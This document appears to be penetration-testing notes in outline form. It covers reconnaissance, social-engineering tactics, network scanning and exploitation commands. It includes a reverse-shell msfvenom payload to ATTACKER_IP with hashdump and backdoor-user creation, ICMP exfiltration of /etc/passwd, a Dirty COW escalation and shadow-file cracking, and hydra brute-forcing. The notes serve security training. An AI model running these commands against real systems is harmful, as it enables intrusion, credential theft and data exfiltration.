- OSINT
- Social Engineering
- External Network Pentesting
- Internal Network Pentesting
- Cool Paid Industry Tools
The whole framework.
- SubBrute:
subbrute.py example.com
nmap --script dns-brute example.com
dnsmap example.com
fierce -dns example.com
python3 sublist3r.py -d example.com -p 80 -e Bing
- urlcrazy:
urlcrazy -p example.com
allintitle:
restricts the results to those pages containing all the query terms specified in the titleallintext:
searches pages with content specified in search criteria - inurl: restricts the results to those pages containing the word specified in the URL - allinurl: restricts the results to those pages containing all the query terms specified in the URLlink:
searches websites or pages that contain links to the specified website or page - info: finds information for the specified web page - related: displays websites that are similar or related to the specified URL - cache: displays Google’s cached version of a web page, instead of the current version of the web pagelocation:
finds information for a specific location - define: finds definitions of words, phrases, and acronyms - filetype: allows searching based on a file extension - id: an undocumented alias for info - inanchor: restricts results to those pages containing the query terms specified in the anchor text on links to the pageallinanchor:
restricts results to those pages containing all query terms specified in the anchor text on links to the pageauthor:
restricts Google Groups results to include newsgroup articles by the specified author; the author can be a full or partial name or email addressgroup:
restricts Google Groups results to newsgroup articles from certain groups or subareasinsubject:
restricts articles in Google Groups to those that contain the specified terms - intext: restricts results to documents containing the term in the text - source: restricts results to articles from the news source with the specified ID
nmap -sn --script ip-geolocation-* example.com
- Gathering info on employees:
theharvester -d example.com -l 500 -b google (linkedin) -h result.html
- Searching for doc and pdf files:
metagoofil.py -d example.com -t doc,docx,pdf,xlsx,xls,ppt,pptx -l 100 -n 10 -o output -f result.html
- phishingfrenzy to enumerate search engines for emails
- haveibeenpwned
- pastebin
- pipl
- people finder
- TruePopleSearch
- Check all common social media
dnsrecon -d example.com
dnsenum -enum example.com
dig example.com
(+short
for IP)dnsrecon -r 132.32.23.2-132.32.23.5
(reverse lookup on an IP range)- Reverse IP/domain check
- DNS zone transfer:
dig ns example.com
dig @ns1.bluehost.com example.com. axfr
dnsrecon -t axfr -d example.com
traceroute ip
nmap --traceroute --script traceroute-geolocation example.com
- SmartDraw, Gliffy, etc. to draw the topological map
- Maltego
- fsociety (osint, passowrd attacks, wireless testing, exploitation tools, sniffing, spoofing, web hacking, post exploitation)
- pentmenu (recon, dos, extraction)
- domains/subdomains
- location
- employess
- phone numbers, emails
- products/services
- network devices
- website directories
- public IP address block
- DNS records
Identify possible attack surfaces.
- Rules of Engagement (RoE)
- Be aware of local laws in the region before conducting SE
- Phishing
- Spear phishing
- Whaling
- Pharming
- Vishing
- SMSishing
- Piggybacking/Tailgating
- Eavesdropping
- Sholder surfing
- Baiting/media dropping
- Dumpster diving
- Reverse social engineering
- Elicitation techniques
- Motivation techniques
- OhPhish
- BLACKEYE
- ShellPhishing
- Phishing Frenzy
- LUCY
- SET
- SpeedPhish Framework
- Gophish
- Name and employee ID
- Emails and passwords
- SSN
- Addresses, phone numbers
- PII, sensitive info
- Detect unnecessary open ports
- Firewall bypass testing
- IDS evasion testing
- Testing switching and routing issues
- OSINT
- Port scanning
- OS and service fingerprinting
- Vulnerability research
- Exploit verifitication
- Reporting
- Quick ping scan:
sudo nmap -sn 192.168.0.0/24
sudo netdiscover -i eth0 -p
(passive)sudo netdiscover -i eth0 -r 192.168.0.0/24
(active)- ICMP ping scan:
nmap -sP IP
- SYN scan:
nmap -sS -P0 IP
- All ports SYN scan:
nmap -sS -p- -P0 -max-rtt-timeout <time> IP
- Specific port SYN scan:
nmap -sS -p80,443 -P0 IP
- Fragmentation scan:
nmap -sS -A -f IP
- OS scan:
nmap -O -F IP
- Scan for patches
sudo hping3 --scan known 192.168.0.7 -S
(known ports from/etc/services
)sudo hping3 --scan '0-3000' 192.168.0.7 -S
(scan a port range)
- Website info:
sudo whatweb example.com
- Wordpress scan:
sudo wpscan --url example.com --enumerate u
(users) - Wordpress scan:
sudo wpscan --url example.com --enumerate t
(themes) - Wordpress scan:
sudo wpscan --url example.com --enumerate p
(plugins) msfconsole
:load wmap
wmap_sites -a example.com
(add a site)wmap_targets -t IP_of_the_site
(add a target)wmap_run -t
(load modules based on the site)wmap_run -e
(run the assessment)vulns
(display vulnerabilities)
- Nikto
- Vega
- Passive:
sudo p0f -i any -p -o /tmp/sniff.log
(-p
for promiscuous) sudo nmap -O IP
dmitry -pf IP
dmitry -pb IP
(b
for banner grab)
For any ASCII file to be sent over the network as ICMP:
- Listening window on the server:
sudo hping3 0.0.0.0 --listen signature --safe --icmp
- On the client to send to the server:
sudo hping3 IP --icmp -d 100 --sign signature --file /etc/passwd
xsltproc -o ~/scanresults.html /usr/share/nmap/nmap.xsl scan.xml
- Host/IP
- OS
- Ports
- Services
- Vulnerabilities
- Exploit
- Notes
- Priority
- Google Hacking DB
- National Vulnerability Database
- Exploit DB
- CVE
- Vulmon
searchsploit -t Windows Server 2008
searchsploit Windows Server 2008 | grep -i local
searchsploit Windows Server 2008 | grep -v kernel
nmap --script smb-os-discovery IP
nmap -sC IP
(default script scan)- SMB exploit on Win 7 (eternalblue):
nmap --script=smb-os-discovery -p 445 IP
- Open
msfconsole
:use auxiliary/scanner/smb/smb_ms17_010
set rhosts IP
set processinject lsass.exe
(optional)run
nmaps -T4 -A IP
- Focus on RPC, NFS, and mountd services.
rpcinfo -p IP
showmount -e IP
(discover NFS shares listed in/etc/exports
)sudo mount -t nfs 172.19.19.51:/home /mnt -o nolock
(-t
specifies the type of the file system (nfs). Specifyingnolock
disables the file locking)- Try to access and remove files to confirm read/write.
- Check if Finger port is opened:
nmap -p 79 192.168.0.50
finger @192.168.0.50
finger Admin@192.168.0.50
- Alternatively, use telnet:
telnet 192.168.0.50 79
(type the username, e.g.Admin
) - Safeguard: disable Finger service by editing the
finger
text file in /etc/xinetd.d
sudo service postgresql start
sudo msfdb init
sudo msfconsole
workspace -h
- Create a workspace
workspace -a LPT
db_nmap -sP IP
- Type
services
orhosts
to examine the scan results from the workspace host -h
to check on all available optionsuse auxiliary/scanner/portscan/tcp
hosts -c address,os_flavor -S Linux -R
(-R
inputs the hosts into the aux scanner's RHOSTS)run
- Open Cain & Abel
- Configure Ethernet
- Select Sniffer and pick the Ethernet adapter
- Start sniffing
- In the Sniffer tab, Plus (+) icon (or) right click in the window, select Scan MAC Addresses to scan the network for hosts
- Select ARP (bottom-left corner) after getting the MAC addresses
- Click (+) to add a new ARP poison route
- Select two IPs that communicate (like FTP server and Ads Dept)
- Start ARP
- Check Passwords tab (bottom-left corner)
- Install L0phtCrack on Windows
- Run it and extract passwords from weak NTLM hashes
hydra -L /root/Wordlists/Usernames.txt -P /root/Wordlists/Passwords.txt ftp://IP
- OpenVAS for vulnerability scanning
- Searchsploit (
searchsploit openssl remote
) - Copy metasploit modules:
- to the appropriate folder, e.g.
usr/share/metasploit-framework/modules/exploits/multi/http
reload_all
inside ofmsfconsole
search new_exploit_name
- to the appropriate folder, e.g.
- Villain a Windows & Linux backdoor generator and multi-session handler that allows users to connect with sibling servers (other machines running Villain) and share their backdoor sessions
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b '\x00' lhost=ATTACKER_IP lport=443 -f exe > /home/pentester/Desktop/shikata.exe
(reverse meterpreter shell)service apache2 start
(for sharing files with remote users)mkdir /var/www/html/share
chmod -R 755 /var/www/html/share/
cp /home/pentester/Desktop/shikata.exe /var/www/html/share
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost ATTACKER_IP
set lport 443
exploit
getsystem
run post/windows/gather/hashdump
run getgui -e
(enables the remote desktop connection to the machine)run getgui -u POPS -p frasporD@123
(create a user POPS)xfreerdp /u:POPS /p:frasporD@123 /v:TARGET_IP
To crack the hashes, use JohnTheRipper (run export CPUID_DISABLE=1
before using john) or hashcat:
sudo john --format=nt /home/pentester/Desktop/hashes.txt
- Brute force SSH:
hydra -L /home/pentester/Wordlists/Usernames.txt -P /home/pentester/Wordlists/Passwords.txt TARGET_IP ssh
- Connect to the target machine, run
uname -a
andlsb_release -a
to get Linux distro info and version - Test if you can switch to root:
sudo su
searchsploit dirty cow
- Copy the exploit to the root folder:
searchsploit -m linux/local/40847.cpp
- Copy the contents of the file into a file on the target machine
- Compile the code:
g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil
./dcow -s
cat /etc/passwd
(save the content into a file for cracking password hashes)cat /etc/shadow
(save this to another file)unshadow password.txt shadow.txt > unshadowed.txt
export CPUID_DISABLE=1
sudo john unshadowed.txt
- Identify internal domains:
net view /domain
- List of files/print shares:
net view \\ computername
- List of files/print shares including hidden:
net view \\ computername /all
- List of shares on a Netware PC:
net view /network:nw
- Find the domain name:
systeminfo | findstr /B /C:"Domain"\
- Find the logged in user's domain:
echo %userdomain%
- WMIC to find the domain:
wmic computersystem get domain
- List all available servers on the domain:
net view /domain: [domain name]
arp -a
ipconfig
nmap
- Soft Perfect Network Scanner
- MyLanViewer
- SolarWinds IP network brows
- Active mode:
netdiscover -r 10.0.0.0/24
- Passive mode:
netdiscover -p 10.0.0.0/24
- Bettercap
- Bruteratel a customized C2 for red team and adversary simulation
- CobaltStrike adversary simulation and red team operations